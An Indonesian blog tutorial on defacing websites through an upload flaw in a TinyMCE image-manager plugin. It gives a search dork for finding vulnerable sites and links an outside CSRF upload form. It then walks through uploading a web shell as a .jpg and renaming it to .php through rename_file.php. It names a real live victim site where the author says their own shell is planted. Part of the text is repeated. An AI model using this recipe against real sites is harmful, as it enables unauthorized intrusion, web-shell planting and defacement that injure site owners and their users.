Tutorial Deface Dengan Cara TinyMce Plugins Image Manager
Baik rekan semuanya kali ini admin akan membagikan Tutorial Deface Dengan Cara TinyMce Plugins Image Manager yang mana ini merupakan postingan yang sekian kali terkait tutorial deface. Apa kah TinyMice itu, bagaiamna caranya? Daripada cos ces cos ces. Yuuk langsung aja kita simak.
DORK : inurl:/tinymce/plugins/image/ ( Selebihnya kembangkan sendiri )
Exploit : site.com/(path)/tinymce/plugins/image/upload.php
Live Target : https://www.madisonts.com/js/tinymce/plugins/image/upload.php
Baca Juga: Tutorial Deface Dengan Cara SQL Injection Manual
1. Kalian dorking dulu ke google, bing atau search engine lainnya, pke dork di atas yg gw kasih
2. site yg vuln seperti ini
Vuln tidak juga ada yg seperti itu, ada juga yg blank seperti ini
DORK : inurl:/tinymce/plugins/image/ ( Selebihnya kembangkan sendiri )
Exploit : site.com/(path)/tinymce/plugins/image/upload.php
Live Target : https://www.madisonts.com/js/tinymce/plugins/image/upload.php
Baca Juga: Tutorial Deface Dengan Cara SQL Injection Manual
1. Kalian dorking dulu ke google, bing atau search engine lainnya, pke dork di atas yg gw kasih
2. site yg vuln seperti ini
3. Selanjutnya salin url nya, upload shell menggunakan CSRF nya ada di sini http://trolling-system.ooo/csrf.txt kalian upload di web dengan nama csrf.php
4. Upload extensi shell .jpg , inget jangan langsung upload ext .php, upload menggunakan csrf di atas yg gw kasih, ubah bagian <form action="site.com" dengan web yg vuln
5. lalu upload shell ext jpg nya, kalau sukses muncul seperti ini
6. Nah kalau muncul sepeti ini salin tulisan FILE-20180702-0754DCWUCH8NHQFC.jpg nah yang kaya gitu
7. Lalu kita disini mengubah shell jpg kita menjadi php, gimana caranya? sans ikutin
http://site.com/[path]/tinymce/plugins/image/rename_file.php?current_name=NAMA-FILE-SHELL-YANG-BERHASIL-DI-UPLOAD.jpg&new_name=namashellbaru.php
Ga ngerti? ok contoh seperti ini
https://www.madisonts.com/js/tinymce/plugins/image/rename_file.php?current_name=FILE-20180702-0754DCWUCH8NHQFC.jpg&new_name=bacot.php
8. kalau success muncul tulisan banyak seperti ini
9. tinggal kita akses deh
akses shell : site.com/[path]/tinymce/plugins/image/uploads/namashellyangbaru.php
look >> https://www.madisonts.com/js/tinymce/plugins/image/uploads/bacot.php nah ini shell gw
Bagaimana cukup mudah bukan? eheheh
Baca Juga: Tutorial Deface Dengan Cara URL Poisoning
Demikianlah tutorial terkait Tutorial Deface Dengan Cara TinyMce Plugins Image Manager yang semoga bermanfaat untuk kita semua, dan jika ada hal yang belum jelas silahkan tanyakan pda kami. Wassalam
Open Comments
Close Comments